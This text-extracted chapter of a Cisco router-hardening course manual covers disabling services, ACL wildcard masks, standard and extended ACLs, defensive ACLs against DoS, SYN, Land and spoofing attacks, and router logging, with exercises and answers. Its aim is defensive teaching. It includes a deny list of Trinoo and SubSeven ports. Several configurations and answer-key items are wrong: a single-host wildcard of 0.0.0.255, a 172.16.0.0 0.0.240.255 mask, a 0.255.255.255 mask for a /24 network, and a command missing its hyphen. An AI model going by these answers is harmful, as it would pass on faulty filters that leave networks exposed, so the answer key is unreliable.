Remaining ServicesAs a security professional, you know that hardening a piece of equipment meansdisabling or removing all of the services and protocols that you are not using. Inthis section, you will see several other services that you should consider disablingfor your router. In consideration of space, every service and protocol cannot belisted in this section—only several of the significant services can be highlighted.

• The BootP service is used to remotely boot computers via the network. Thisservice can be disabled by using the no ip bootp server command.

• The DNS function is enabled on Cisco routers, but there is no defined nameserver. The net result is broadcasting for all DNS requests. To disable thisfunction, use the no ip name-server command.

• The Network Time Protocol (NTP) is used for time synchronization on thenetwork. This service can be disabled by using the no ntp servercommand. If you want to disable this protocol for only a single interface, thecommand to use is ntp disable, when you are in the Interface Mode.

• The Simple Network Management Protocol (SNMP) is used to communicatebetween network devices. SNMP left as-is on routers can provide informa-tion about the router to attackers. Disable SNMP by using the nosnmp-server command.

• HTTP is used on some version of the routers to allow for remote access andmanagement. Unless specifically required in your organization, this shouldbe disabled. To disable HTTP, use the no ip http server command.

The configuration fragment that will disable all of the above services will looklike this:

Router#config terminalRouter(config)#no ip bootp serverRouter(config)#no ip name-serverRouter(config)#no ntp serverRouter(config)#no snmp-serverRouter(config)#no ip http serverRouter(config)#^ZRouter#

When NTP is used inconjunction with syslog

services, thus keepingaccurate timestamps on logentries, it can be useful for

forensic purposes.

358 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 412: SCNP Hardening

TASK 5C-3Removing Unneeded Services

1. Create the configuration fragment that you would use to remove the fol-lowing services from the whole IOS v12.x router: CDP, ICMP DirectedBroadcasts, Small Servers, Source Routing, and Finger. For this exercise,you can assume that the interfaces are named E0, S0, and S1.

Router#config terminalRouter(config)#no cdp runRouter(config)#interface Ethernet 0Router(config-if)#no ip directed broadcastRouter(config)#interface Serial 0Router(config-if)#no ip directed broadcastRouter(config)#interface Serial 1Router(config-if)#no ip directed broadcastRouter(config-if)#^ZRouter#Router#config terminalRouter(config)#no service tcp-small-serversRouter(config)#no service udp-small-serversRouter(config)#no ip source-routeRouter(config)#no ip fingerRouter(config)#^ZRouter#

Topic 5DCreating Access Control ListsAccess Control Lists (ACLs) enable network administrators to not only controlaccess from a security standpoint, but also can be used to restrict bandwidth useon critical links. In this and the following topic, the discussion will be on IPaccess lists, but be aware that access lists can exist for other routed protocols,such as AppleTalk and IPX/SPX.

An ACL is a packet filter that compares a packet with a given set of criteria. TheACL checks the packet and acts upon the packet as defined by the list. AccessControl Lists are divided into two main categories, standard and extended.

• Standard ACLs are designed to look at the source address of a packet thathas been received by the router. The result of the list is to either permit ordeny the packet based on the subnet, host, or network address. A standardaccess list takes effect for the full IP protocol stack.

• Extended ACLs are designed to look at both the source and destinationpacket addresses. Not limited to source IP address, extended lists allow forchecking of protocol, port number, and destination address. This additionalflexibility is the reason that many administrators implement extended lists ontheir networks.

packet filter:Inspects each packet for userdefined content, such as anIP address, but does nottrack the state of sessions.This is one of the leastsecure types of firewall.

Lesson 5: Routers and Access Control Lists 359

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 413: SCNP Hardening

Access Control List OperationThe function of an access list is the same internally in the router, whether it is astandard list or an extended list. The process begins the same as a router with noaccess lists. First, as the packet enters the router, the routing table must bechecked. If there is no route, the packet is discarded and a message may bereturned to the sender (such as an ICMP destination unreachable message).

If the packet is routable, the router must next check to see if the interface thatwill route the packet has an access list defined. If there is no list, the packet isrouted out the appropriate interface. If there is a list defined, the packet is verifiedthrough the list to decide if the packet is to be permitted or dropped.

Figure 5-13: The Access Control List process.

Figure 5-13 illustrates this process. A packet is taken in via Interface E0. In thisexample, the packet is incoming on Interface Ethernet 0 and destined to be outgo-ing on Interface Ethernet 1. Because the list is used to determine whether or notthe packet is to exit on interface Ethernet 1, this list can be determined to be anoutgoing list.

The Access List ProcessA critical component of access lists is to understand that they operate insequence, from the top down. In other words, the first statement of an access listsis checked. If the packet does not match the rules of that statement, then thepacket is sent to the next statement, and on and on, until there is a match.

Once there is a match, the packet will follow that rule. In the event that there aretwo rules that can apply to the same packet, whichever rule the packet hits first isthe one that it will follow.

The ACL Process

360 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 414: SCNP Hardening

There will always be a match, since the end of every access list is an implicitdeny, meaning that every list must have at least one permit statement or all pack-ets will be denied! Figure 5-14 shows a graphical example of an access liststatement process.

Figure 5-14: The list process of an ACL.

The Wildcard MaskIP access lists use a value known as the wildcard mask to determine whether ornot a packet matches a given statement in the list. The wildcard mask uses 1s and0s to identify the defined IP address(es) for permission or denial.

Wildcard masks are 32-bit values that look like traditional subnet masks, but theydo not function in the same manner. A wildcard mask uses the 1s and 0s to matchdefined bits of an IP address. The rules of the bits of a wildcard mask are as fol-lows:

• If the wildcard mask bit is a 1, then do not check the corresponding bit ofthe IP address for a match.

• If the wildcard mask bit is a 0, then do check the corresponding bit of the IPaddress for a match.

The chart in Figure 5-15 shows several examples of the wildcard mask checkingoptions. Where there is a 0, the values are checked for a match, and where thereis a 1, the value is not checked.

The List Process of an ACL

Wildcard Mask Examples

Lesson 5: Routers and Access Control Lists 361

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 415: SCNP Hardening

Figure 5-15: Examples of wildcard masks.

As you can see from this chart, if there were a mask of 11111111, then none ofthe eight bits of the corresponding IP address would be checked. Likewise, ifthere were a wildcard mask of 00000000, then all eight bits of the correspondingIP address would be checked.

Wildcard Mask ExamplesIf an administrator wanted to have an access list statement match a single host ina network, the following wildcard mask could be used.

Item ValueIP Address 10.15.10.187Subnet Mask 255.255.255.0Wildcard Mask 0.0.0.0

This tells the router to check every bit of the IP address, and if those bits are10.15.10.187, then this access list statement applies to this host.

If the goal is to have an access list statement match an entire network, the fol-lowing wildcard mask could be used.

Item ValueIP Network 10.15.10.0Subnet Mask 255.255.255.0Wildcard Mask 0.0.0.255

This tells the router to check only the first 24 bits of the IP address, and if thedecimal value of those bits are 10.15.10, then this access list statement applies tothis host.

If the goal is to block a specified subnet, the mask requires a bit more calcula-tion, but still functions the same way. In the event that the administrator wants tohave subnet 10.15.10.32 match an access list statement, the mask would be asfollows.

Item ValueIP Subnet Address 10.15.10.32

362 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 416: SCNP Hardening

Item ValueSubnet Mask 255.255.255.224Wildcard Mask 0.0.0.31

This tells the router to check all but the last five bits of the fourth octet. If thechecked bit equals 10.15.10.32, then the access list statement applies to this host.

TASK 5D-1Creating Wildcard Masks

1. If your goal is to block out a single host, such as 192.168.27.93, that uses255.255.255.0 as the subnet mask, what wildcard mask would you use?

0.0.0.255.

2. If your goal is to block out a subnet of 10.12.24.0 that uses 255.255.248.0as the subnet mask, what wildcard mask would you use?

0.0.7.255.

3. If your goal is to block out network 172.168.32.0 that uses 255.255.255.0as the subnet mask, what wildcard mask would you use?

0.0.0.255.

Topic 5EImplementing Access Control ListsIn this topic, we will detail the implementation of and rule-creation for accesslists. There will be examples of access lists and their syntax on a Cisco router.Examples will include both standard and extended IP access lists, the most com-mon lists for networks connected to the Internet today.

Access Control Lists are implemented in two stages on Cisco routers. The firststage is to create the list, including all of its statements. The second stage is theimplementation of the list on an interface of a router, defining whether the list isto filter packets as an inbound or outgoing list.

Standard Access Control List Command SyntaxTo create a standard ACL, the following line shows the proper syntax. Items initalics are variables to be filled in.

Router(config)#access-list access-list-number {permit|deny}source [source-mask]

Although you have theoption of using standard orextended access lists, theextended lists are preferredbecause they provide moregranularity when you arepermitting and denyingtraffic.

Lesson 5: Routers and Access Control Lists 363

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 417: SCNP Hardening

Where:

• access-list is the actual command to create a list.

• access-list-number is a value between 1 and 99, that is selected to create astandard ACL.

• permit|deny is the value that defines whether the list will grant or blockaccess.

• source is the value that is the actual source address to match.

• source-mask is the value that specifies the wildcard mask for the definedhost.

Once the list has been created, the second stage is to apply the list to aninterface. Before you do this, however, make sure that you have specified theinterface that you want to be affected by the list. The syntax for list application isshown here. Again, items in italics are variables to be filled in.

Router(config-if)#ip access-group access-list-number {in|out}

Where:

• ip access-group is the command to link (implement) a list to aninterface.

• access-list-number is the value assigned to the actual list to be implementedon this interface.

• in|out is the value that defines whether the list will filter inbound or out-bound packets.

Extended Access Control List SyntaxTo create an extended ACL, the following line shows the proper syntax. Remem-ber, items in italics are variables to be filled in.

Router(config)#access-list access-list-number {permit|deny}protocol source source-mask destination destination-mask[operator|operand]

Where:

• access-list is the actual command to create a list.

• access-list-number is a value between 100 and 199, that is selected to createan extended ACL.

• permit|deny is the value that defines whether the list will grant or blockaccess.

• protocol is the value that defines what protocol to filter.

• source is the value that defines the source IP address.

• source-mask is the value that defines the wildcard mask for the source.

• destination is the value that defines the destination IP address.

• destination-mask is the value that defines the wildcard mask for thedestination.

• operator|operand is the value that defines the options for the list.Options include:

— GT—Greater than

— LT—Less than

— EQ—Equal to

364 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 418: SCNP Hardening

— NEQ—Not Equal to

Once the list has been created, the second stage is to apply the list to aninterface. The syntax for list application is shown. As before, items in italics arevariables to be filled in.

Router(config-if)#ip access-group access-list-number {in|out}

Where:

• ip access-group is the command to link (implement) a list to aninterface.

• access-list-number is the value assigned to the actual list to be implementedon this interface.

• in|out is the value that defines whether the list will filter inbound or out-bound packets.

Figure 5-16: A sample network for ACL implementation.

Use Figure 5-16 with the network and host IP addresses defined to look at severalexamples of access lists. The same figure will be used for all examples, only withdifferent lists, different goals, and different implementations. These examples willbe using both standard and extended IP access lists.

Denial of a Specific HostOur first example will be the simple denial of a defined host into the router. Thiscan be accomplished by using a standard ACL.

The configuration fragment for this example is:

Router#configure terminalRouter(config)#access-list 23 deny 192.168.10.7 0.0.0.0Router(config)#access-list 23 permit 0.0.0.0 255.255.255.255Router(config)#interface Ethernet 0Router(config-if)#ip access-group 23 inRouter(config-if)#^ZRouter#

Sample Network for ACLImplementation

The third line is permittingall traffic not denied by thesecond line. The word “any”can be used in place of “0.0.0.0 255.255.255.255.”

Lesson 5: Routers and Access Control Lists 365

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 419: SCNP Hardening

Denial of a SubnetOur second example will be the denial of a defined host out to the Internet andthe denial of an entire network to the Internet. This can also be accomplished byusing a standard ACL. The configuration fragment for this example is:

Router#configure terminalRouter(config)#access-list 45 deny 192.168.10.7 0.0.0.0Router(config)#access-list 45 deny 192.168.20.0 0.0.0.255Router(config)#access-list 45 permit 0.0.0.0 255.255.255.255Router(config)#interface Serial 0Router(config-if)#ip access-group 45 outRouter(config-if)#^ZRouter#

Denial of a NetworkOur third example will be the denial of an entire network from another network.This can be accomplished by using a standard ACL. The configuration fragmentfor this example is:

Router#configure terminalRouter(config)#access-list 57 deny 192.168.20.0 0.0.0.255Router(config)#access-list 57 deny 192.168.10.0 0.0.0.255Router(config)#access-list 57 permit 0.0.0.0 255.255.255.255Router(config)#interface Ethernet 0Router(config-if)#ip access-group 57 outRouter(config-if)#interface Ethernet 1Router(config-if)#ip access-group 57 outRouter(config-if)#^ZRouter#

Granting Telnet from One Specific HostOur fourth example will be limiting the permission of given hosts to telnet to theInternet and the denial of a network telnetting to the Internet. This can be accom-plished by using an extended ACL, due to the need to control access to individualports. The configuration fragment for this example is:

Router#configure terminalRouter(config)#access-list 123 permit tcp 192.168.20.16 0.0.0.00.0.0.0 255.255.255.255 eq 23Router(config)#access-list 123 permit tcp 192.168.10.7 0.0.0.00.0.0.0 255.255.255.255 eq 23Router(config)#access-list 123 deny tcp 192.168.0.0 0.0.255.2550.0.0.0 255.255.255.255 eq 23Router(config)#access-list 123 permit ip 0.0.0.0 255.255.255.2550.0.0.0 255.255.255.255Router(config)#interface Serial 0Router(config-if)#ip access-group 123 outRouter(config-if)#^ZRouter#

Granting FTP to a SubnetOur fifth example will be granting one subnet the ability to ftp to the Internet,while denying the other subnet. Again, this can be accomplished by an extendedACL, due to the need to control access to individual ports. The configurationfragment for this example is:

The fourth line is permittingall traffic not denied by the

second and third lines.

For the fifth line, permitip any any could be

used to shorten the syntax.

366 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 420: SCNP Hardening

Router#configure terminalRouter(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.2550.0.0.0 255.255.255.255 eq 20Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.2550.0.0.0 255.255.255.255 eq 21Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.2550.0.0.0 255.255.255.255 eq 20Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.2550.0.0.0 255.255.255.255 eq 21Router(config)#access-list 145 permit ip any anyRouter(config)#interface Serial 0Router(config-if)#ip access-group 145 outRouter(config-if)#^ZRouter#

Defending Against Attacks with ACLsACLs can be used for much more than simply granting or denying access to aservice or utility. They can be used to guard against known attacks on the net-work, such as SYN and DoS attacks. This is due to the fact that many tools useknown and identifiable patterns in their attacks.

Anti-DoS ACLsThese ACLs work by recognizing the protocol and port selection of the DoSattack. It is possible that by using these ACLs, you may block legitimate applica-tions that have chosen the same high port values, so that must be taken intoaccount. In order to prevent hosts inside the network from participating in a DoSon an Internet host, you should consider placing these on all interfaces, in bothdirections. At the minimum, you will place these lists on the inbound interfacesthat are connected to the Internet.

In the configuration fragment that follows, the first section (ports 27665, 31335,27444) of the list is designed to block the TRINOO DDoS, and the second sec-tion (ports 6776, 6669, 2222, 7000) is designed to block the SubSeven DDoS.

Router(config)#access-list 160 deny tcp any any eq 27665Router(config)#access-list 160 deny udp any any eq 31335Router(config)#access-list 160 deny udp any any eq 27444Router(config)#access-list 160 deny tcp any any eq 6776Router(config)#access-list 160 deny tcp any any eq 6669Router(config)#access-list 160 deny tcp any any eq 2222Router(config)#access-list 160 deny tcp any any eq 7000

Anti-SYN ACLsThe TCP SYN attack is where the attacker floods the target host and disallowsany legitimate connections to be made by the target host. To work on blockingthis, the ACL must allow legitimate TCP connections, which are created by hostsinside the network, but disallow connections to those hosts from outside (like onthe Internet).

In this first configuration fragment, traffic that is established internally is allowedout, and incoming connections are not able to create new sessions.

Lesson 5: Routers and Access Control Lists 367

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 421: SCNP Hardening

Router#configure terminalRouter(config)#access-list 170 permit tcp any 192.168.20.00.0.0.255 establishedRouter(config)#access-list 170 deny ip any anyRouter(config)#interface Serial 0Router(config-if)#ip access-group 170 inRouter(config-if)#^ZRouter#

Anti-Land ACLsAnother type of attack that has been around for some time is the Land attack.The Land attack is rather simple in design, but it can cause serious network dam-age to unprotected systems. The attack works by sending a packet from an IPaddress to the same IP address, and using the same ports. So, a packet would besent from 10.10.10.10:5700 to 10.10.10.10:5700 causing a significant slowdownor DoS of the target.

The following configuration fragment shows the defense against a Land attack onhost 10.20.30.50, which is an IP address of an external interface on the router.

Router#configure terminalRouter(config)#interface Serial 0Router(config-if)#ip address 10.20.30.50 255.255.255.0Router(config-if)#exitRouter(config)#Router(config)#access-list 110 deny ip host 10.20.30.50 host10.20.30.50 logRouter(config)#access-list 110 permit ip any anyRouter(config)#interface Serial 0Router(config-if)#ip access-group 110 inRouter(config-if)#^ZRouter#

Anti-spoofing ACLsSpoofing of packets has become more commonplace due to the increased numberof tools that provide this function. You can use your router to combat this issueby not allowing packets to enter the network if they are coming from an internalIP address.

When you create these lists, you want them to be complete. In other words, donot forget to block the broadcast addresses (to prevent attacks like the Smurfattack), the network addresses themselves, and private or reserved addresses. Inthe following configuration fragment, the internal network is 152.148.10.0/24, andyou will see that there are quite a few lines necessary to provide for full spoofprotection:

368 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 422: SCNP Hardening

Router#configure terminalRouter(config)#access-list 130 deny ip 152.148.10.0 0.0.0.255 anyRouter(config)#access-list 130 deny ip 127.0.0.0 0.255.255.255anyRouter(config)#access-list 130 deny ip 0.0.0.0 255.255.255.255anyRouter(config)#access-list 130 deny ip 10.0.0.0 0.255.255.255 anyRouter(config)#access-list 130 deny ip 172.16.0.0 0.0.240.255 anyRouter(config)#access-list 130 deny ip 192.168.0.0 0.0.255.255anyRouter(config)#access-list 130 deny ip host 255.255.255.255 anyRouter(config)#access-list 130 permit ip any 152.148.10.00.0.0.255Router(config)#interface Serial 0Router(config-if)#ip access-group 130 inRouter(config-if)#^ZRouter#

TASK 5E-1Creating Access Control Lists

Setup: Use the network as diagrammed in Figure 5-16 for this task.

1. Create the configuration fragment that you would use to create anAccess Control List to prevent a SYN attack coming from the Internetinto the private networks.

Router#configure terminalRouter(config)#access-list 135 permit tcp any 192.168.20.00.0.0.255 establishedRouter(config)#access-list 135 permit tcp any 192.168.10.00.0.0.255 establishedRouter(config)#access-list 135 deny ip any anyRouter(config)#interface Serial 0Router(config-if)#ip access-group 135 inRouter(config-if)#^ZRouter#

Topic 5FLogging ConceptsAlthough it does not get the credit or generate a high level of interest, logging onthe router is a critical aspect of router hardening. Logs enable you to investigateattacks, find problems in the network, and analyze the network.

When you are configuring the logging options on a router, just as logging else-where in the network, you must walk a fine line between gathering too much andtoo little information. Log too much, and you will have a difficult time findingthat single piece of critical information you need to make a decision or to per-form an action. Log too little, and you do not have enough information to makean informed decision or to take proper action.

Lesson 5: Routers and Access Control Lists 369

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 423: SCNP Hardening

There are many different kinds of logging applications and software products thatcan track and record logs from all over the network. These applications can thensend messages to a pager or cell phone when significant events happen. In thissection, you will look at just the options that the actual router can manage, with-out using any major third-party applications.

Cisco Logging OptionsOn a Cisco router, the device can log information using several different methods,such as:

• Console Logging—Log messages are sent to the console port directly.

• Terminal Logging—Log messages are sent to the VTY sessions.

• Buffered Logging—Log messages are kept in the RAM on the router. Oncethe buffer fills, the oldest messages are overwritten by newer messages.

• Syslog Logging—Log messages can be sent to an external syslog server tostore and sort the messages there.

• SNMP Logging—Log messages are sent (by using SNMP traps) to anSNMP server on the network.

Log PriorityThe router has a built-in function of priority listing for log messages. The levelsrange from 0 to 7. If a message is given a lower number, it is considered to be amore critical message. So, Level 1 is more critical than Level 6.

When you select a level, that level and all others of a lower number will bedisplayed. For example, if you select level 3, you will be presented with mes-sages from level 3 to 0. If you select level 7, you will be presented withmessages from level 7 to 0.

The following table lists the level of logs, along with their titles and descriptions.

Level Title Description0 Emergencies System is (or is becoming) unusable.1 Alerts Immediate action is needed.2 Critical A critical condition has occurred.3 Errors An error condition has occurred.4 Warnings A warning condition has occurred.5 Notifications Normal, but noteworthy event.6 Informational Informative message.7 Debugging Debugging message.

The following table lists an example event for each level of severity.

Level Example0 The IOS was unable to initialize.1 The core router temperature is too high.2 A problem in assigning memory occurred.3 The memory size allocated is invalid.4 Cryptography operation is unable to complete.5 An interface changed state to up or down. (This is a very common event.)

370 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 424: SCNP Hardening

Level Example6 A packet has been denied by an Access Control List.7 No event triggers this level; debug messages are displayed only when the debug

option is used.

An example of what a log line will look like in the router is:

%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)

In this line, the %SYS-5-CONFIG_I indicates that a Level 5 message was logged.Following the colon is the message itself. In this case, the router had a configura-tion change made via a VTY session using IP address 172.16.10.1.

Configuring LoggingIn the following examples, you will see how to configure different forms oflogging. Some will use the buffer, others the console. Viewing the configurationfragments through this section will enable you to determine which type of log-ging you will use in given situations. On the Cisco router, the command to enablelogging is entered in Global Configuration Mode, using the logging oncommand.

TimestampingIn order for you to properly analyze the logs, you will need to know what hap-pened when, not just that something happened. The assignment of a time that anevent occurred, or to timestamp, is an option in the router. The Cisco commandto configure the timestamp option is service timestamp log datetime.There are three options that can be added to this message.

• The msec option will include the millisecond in a log entry. This may ormay not be required, based on your goals. If not added, the log will roundthe event to the nearest full second.

• The localtime option will make the router stamp the logs using the localtime, so that it is easier for people to read and analyze the logs. When usinga syslog server, this option is often left off.

• The show-timezone option adds the timezone to the log message. Thiscan be useful when working with log files from many locations and regions.

Console LoggingConsole logging is perhaps the most straightforward of all of the logging optionsin the Cisco router. The following configuration fragment shows logging set tolevel 5 and to use the console as the method.

Router#configure terminalRouter(config)#logging onRouter(config)#logging console notificationRouter(config)#^ZRouter#

In this example, level 5 logging has been configured, This means that items in theaccess list level will not be logged, nor will any debug messages. Had the goalbeen to see only those log messages that are level 2 or more critical, the propercommand would have been logging console critical.

When you are configuringlogging in IOS 11.3 andearlier versions, thecommand must include thename of the level, such asAlerts. In IOS 12.0 andnewer versions, you can useeither the name of the levelor the number of the level.

Lesson 5: Routers and Access Control Lists 371

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 425: SCNP Hardening

Buffered LoggingBuffered logging requires you to define the memory size that will be used for thelogs. The general formula that many follow is that if the router has less than 16MB of RAM, your log can be 16 kilobytes. If your router has more than 16 MBof RAM, then your log can go as high as 32 or even 64 KB.

On all logs, the time and date can be added to the messages, which is a recom-mended procedure. On buffered logging, however, it goes from a recommended toa required procedure. This is due to the fact that the router discards old messagesand replaces them with new messages, when the buffer space is filled. So, thetime of the log is a critical component to buffered logging. The following con-figuration fragment shows logging set to level 2, and using a timestamp.

Router#configure terminalRouter(config)#logging onRouter(config)#logging buffered 16000 criticalRouter(config)#service timestamp log date msec localtimeshow-timezoneRouter(config)#^ZRouter#

In this example, the amount of memory that has been allocated is 16 KB. Thelogs will go to the buffer and will be recorded if they are level 2 (Critical) orhigher. Finally, full timestamping is used, including the local time and the timezone options.

Terminal LoggingNormally, there are no messages sent to terminal sessions. This is for bandwidthpurposes and, in some situations, security purposes. In order to allow logging tobe visible on a VTY session, the terminal monitor command must be used.The following configuration fragment shows logging set to level 5, and to be sentto the VTY sessions.

Router#configure terminalRouter(config)#logging onRouter(config)#logging monitor 5Router(config)#^ZRouter#terminal monitorRouter#

In this example, the terminal session will receive all level 5 and higher messages.This is the first example that uses the numeric value of the level instead of thename, an indicator that the router must be at least IOS version 12.0. There is asecond part for terminal logging. The above fragment will tell the router to logmessages to the VTY sessions, but the VTY sessions have not been configured tosee the messages. The terminal monitor command enables the VTY sessionto actually view the messages on screen. In the event that the logs become tonumerous or are no longer needed, the terminal no monitor command canbe used to stop viewing the logs on the VTY session.

Syslog LoggingCisco routers have the ability to send their log messages to a server that is run-ning as a syslog server. This is a highly recommended method of logging in aproduction environment. Routers collect the log messages, just as they normallydo. However, instead of showing them on the console, or storing them inmemory, they are sent to a server that will manage the messages and store themto the server’s hard drive.

372 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 426: SCNP Hardening

This will allow for long-term storage and analysis of the information and will notbe subject to real time analysis or memory constraints. Most UNIX and Linuxservers have some version of the syslog server function, and there are manysyslog applications for Windows systems on the market.

To configure syslog logging on a Cisco router, there are four components:

• The destination host is any host that can be located using a host name, DNSname, or an IP address.

• The syslog facility is the name to use to configure the storage of the mes-sages on the syslog server. Although there are quite a few facility names, therouters will use the ones named Local0 through Local7.

• The severity level of the logs can be viewed as similar to that of the otherlog messages, using the Cisco severity levels.

• The source interface for the messages is the actual network interface thatwill send the messages to the Syslog server.

The following configuration fragment shows the setup of a router to use a syslogserver.

Router#configure terminalRouter(config)#logging onRouter(config)#logging trap 5Router(config)#logging 10.20.30.45Router(config)#logging facility Local5Router(config)#logging source-interface Ethernet 0Router(config)#^ZRouter#

In this example, logging has been enabled. Logging is going to be sent to asyslog server, logging messages that are level 5 or more critical. The IP addressof the syslog server is 10.20.30.45. (Additional servers can be used with multiplecommands using different IP addresses here, for redundancy.) The facility on thesyslog server is Local5, and the source for these messages is Ethernet 0 on therouter.

TASK 5F-1Configuring Buffered Logging

1. Create the configuration fragment you would use for buffered logging,using 32 kilobytes of memory. Include all timestamping options and loglevel 4 events. Assume that the router is running IOS version 12.2.

Router#configure terminalRouter(config)#logging onRouter(config)#logging buffered 32000 4Router(config)#service timestamp log date msec localtimeshow-timezoneRouter(config)#^ZRouter#

Lesson 5: Routers and Access Control Lists 373

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 427: SCNP Hardening

ACL LoggingThe previous section on logging focused on the system log events, critical errors,and messages. Another important area to investigate is the use of logging in rela-tionship to your Access Control Lists. When implemented, ACL logs are listed asLevel 6 events.

In order to implement ACL logging, the commands are very simple. All you needto add is the keyword log or log-input to the end of the ACL statements.You do not want to add this line to all your ACL statements, however, or youwill flood your logs with so much information that you will be virtually unable toidentify anything useful.

Use of the log keyword will list the type, date, and time in the ACL log, and isa valid option only for standard ACLs on IOS version 12.0 and newer. Thelog-input keyword adds information on the interface and source MACaddress, and an example of the use of this is if the same ACL is to be applied tomore than one interface.

Logging may be one reason that you do not count on the default deny all rule ofan ACL. If a packet is dropped due to the default deny all statement, that packetwill not be logged. If, however, you add the following line as your last statementin the ACL, then packets will be logged: access-list 123 deny ipany any log.

Anti-spoofing LoggingEarlier, you looked at the creation of anti-spoofing ACLs. In this section, you willsee these ACLs used with the logging function to gather information for analysis.In these examples, assume that the internal network is 172.16.0.0/16. First, theconfiguration fragment of the list itself:

Router#configure terminalRouter(config)#access-list 123 deny ip 172.16.0.0 0.0.255.255any log-inputRouter(config)#access-list 123 permit ip any anyRouter(config)#access-list 145 permit ip 172.16.0.0 0.0.255.255any log-inputRouter(config)#access-list 145 deny ip any any log-inputRouter(config)#^ZRouter#

For the next example, assume that the router has one internal Ethernet interface(where the trusted network is located) and has two external serial interfaces. Thefollowing configuration fragment shows the application of the ACLs, first list 123then list 145, on their proper interfaces.

Router#configure terminalRouter(config)#interface Serial 0Router(config-if)#ip access-group 123 inRouter(config-if)#exitRouter(config)#interface Serial 1Router(config-if)# ip access-group 123 inRouter(config-if)#exitRouter(config)#interface Serial 0Router(config-if)# ip access-group 145 outRouter(config)#^ZRouter#

374 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 428: SCNP Hardening

VTY LoggingWhen gaining access to the router, a primary method used was through VTYsessions. These sessions may come under frequent attack at larger organizations.You will want to know who is and who is not successful at gaining access viaVTY sessions—again, logging is the answer to that need.

In this example, you will again assume the internal network 172.16.0.0/16, andthat there is only one trusted host that has authorized VTY access, 172.16.23.45.With those variables defined, the following is the configuration fragment that willlog VTY sessions on the router.

Router#configure terminalRouter(config)#access-list 155 permit host 172.16.23.45 anylog-inputRouter(config)#access-list 155 deny ip any any log-inputRouter(config)#^ZRouter#

Once you have created the list, as shown, you will need to apply the list. In thefollowing configuration fragment, the list is applied to VTY sessions 0 through 4.

Router#configure terminalRouter(config)#line vty 0 4Router(config)#access-class 155 inRouter(config)#^ZRouter#

Lesson 5: Routers and Access Control Lists 375

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 429: SCNP Hardening

TASK 5F-2Configuring Anti-spoofing Logging

1. Create a logged ACL that is used for anti-spoofing, using the followinginformation: The router has interfaces Ethernet0, Serial0, and Serial1.Ethernet0 is connected to the only trusted network, which has the IPaddress 192.168.45.0/24. For this exercise, and in the interest of time,only create anti-spoofing for the defined network. If you want to expandthis to include all private and reserved networks, you can do so, but it isnot required.

Router#configure terminalRouter(config)#access-list 160 deny ip 192.168.45.00.255.255.255 any log-inputRouter(config)#access-list 160 permit ip any anyRouter(config)#access-list 170 permit ip 192.168.45.00.255.255.255 any log-inputRouter(config)#access-list 170 deny ip any any log-inputRouter(config)#^ZRouter#Router#configure terminalRouter(config)#interface Serial 0Router(config-if)#ip access-group 160 inRouter(config-if)#exitRouter(config)#interface Serial 1Router(config-if)# ip access-group 160 inRouter(config-if)#exitRouter(config)#interface Serial 0Router(config-if)# ip access-group 170 outRouter(config)#^ZRouter#

SummaryIn this lesson, you examined the fundamentals of router security and theprinciples of routing. You created the configurations that are required toharden a Cisco router and configured the removal of services and protocols.You examined the process of the wildcard mask and how it relates to theCisco ACL. You created the configurations for ACLs to defend the networkagainst attacks. Finally, you examined the process of logging on a Ciscorouter and configured buffered and anti-spoofing logging.

376 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 430: SCNP Hardening

Lesson Review5A What is authentication?

Authentication is the process of identifying a user, generally granting ordenying access.

What is authorization?

Authorization is the process of defining what a user can do, or is authorizedto do.

What is AAA?

Authentication, Authorization, and Accounting.

What are the methods of access to a Cisco router?

• Console port

• Auxiliary port

• VTY sessions

• HTTP

• TFTP

• SNMP

5B List some of the advantages of using static routing.

Responses might include:

• Precise control over the routes that data will take across the network.

• Easy to configure in small networks.

• Reduced bandwidth use, due to no excessive router traffıc.

• Reduced load on the routers, due to no need to make complex routingcalculations.

What is a security advantage to using RIPv2 over RIPv1?

Using RIPv2 provides the security advantage of authentication, enabling therouters to identify who is and who is not able to update routing information.

5C What is a security reason for disabling CDP?

CDP might be broadcasting information about the router that is not intendedto be public knowledge.

What is an attack that you can defend against by disabling ICMPdirected broadcasts?

Smurf.

5D What type of Access Control List allows for the checking of port num-bers?

Extended ACLs allow for port checking.

Lesson 5: Routers and Access Control Lists 377

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 431: SCNP Hardening

When a packet enters the router, what is the first thing the router willcheck regarding that packet?

Is there a route for this packet? If yes, send to the ACLs if there are any; ifno, discard the packet (and respond to the sender if need be).

5E What is the syntax for a standard Access Control List?

Router(config)#access-list access-list-number{permit|deny} source [source-mask]

What is the syntax for an extended Access Control List?

